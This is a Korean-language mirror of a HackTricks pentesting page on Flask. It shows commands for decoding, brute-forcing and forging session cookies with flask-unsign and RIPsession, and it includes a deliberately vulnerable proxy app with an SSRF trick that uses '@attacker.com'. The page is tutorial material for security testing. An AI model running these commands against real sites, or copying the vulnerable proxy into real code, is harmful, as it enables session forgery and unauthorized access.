mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
89 lines
2.8 KiB
Markdown
89 lines
2.8 KiB
Markdown
# Flask
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
**아마도 CTF를 진행하고 있다면 Flask 애플리케이션은** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/index.html)**와 관련이 있을 것입니다.**
|
|
|
|
## Cookies
|
|
|
|
기본 쿠키 세션 이름은 **`session`**입니다.
|
|
|
|
### Decoder
|
|
|
|
온라인 Flask 쿠키 디코더: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
|
|
|
#### Manual
|
|
|
|
쿠키의 첫 번째 부분을 첫 번째 점까지 가져와서 Base64로 디코드합니다.
|
|
```bash
|
|
echo "ImhlbGxvIg" | base64 -d
|
|
```
|
|
쿠키는 비밀번호를 사용하여 서명됩니다.
|
|
|
|
### **Flask-Unsign**
|
|
|
|
Flask 애플리케이션의 세션 쿠키를 가져오고, 디코드하고, 무차별 대입 공격을 수행하며, 비밀 키를 추측하여 제작하는 명령줄 도구입니다.
|
|
|
|
{{#ref}}
|
|
https://pypi.org/project/flask-unsign/
|
|
{{#endref}}
|
|
```bash
|
|
pip3 install flask-unsign
|
|
```
|
|
#### **쿠키 디코드**
|
|
```bash
|
|
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
|
|
```
|
|
#### **브루트 포스**
|
|
```bash
|
|
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
|
|
```
|
|
#### **서명**
|
|
```bash
|
|
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
|
```
|
|
#### 레거시(구버전) 사용하여 서명하기
|
|
```bash
|
|
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
|
```
|
|
### **RIPsession**
|
|
|
|
쿠키를 사용하여 웹사이트를 무차별 대입 공격하는 명령줄 도구로, flask-unsign으로 제작되었습니다.
|
|
|
|
{{#ref}}
|
|
https://github.com/Tagvi/ripsession
|
|
{{#endref}}
|
|
```bash
|
|
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
|
|
```
|
|
### Flask 세션 쿠키에서 SQLi와 SQLmap
|
|
|
|
[**이 예제**](../../pentesting-web/sql-injection/sqlmap/index.html#eval)는 sqlmap `eval` 옵션을 사용하여 **Flask에 대한 sqlmap 페이로드를 자동으로 서명**하는 방법을 보여줍니다.
|
|
|
|
## Flask 프록시를 통한 SSRF
|
|
|
|
[**이 글**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)에서는 Flask가 "@" 문자로 시작하는 요청을 허용하는 방법을 설명합니다.
|
|
```http
|
|
GET @/ HTTP/1.1
|
|
Host: target.com
|
|
Connection: close
|
|
```
|
|
다음 시나리오에서:
|
|
```python
|
|
from flask import Flask
|
|
from requests import get
|
|
|
|
app = Flask('__main__')
|
|
SITE_NAME = 'https://google.com/'
|
|
|
|
@app.route('/', defaults={'path': ''})
|
|
@app.route('/<path:path>')
|
|
def proxy(path):
|
|
return get(f'{SITE_NAME}{path}').content
|
|
|
|
app.run(host='0.0.0.0', port=8080)
|
|
```
|
|
"@attacker.com"과 같은 것을 도입할 수 있어 **SSRF**를 유발할 수 있습니다.
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|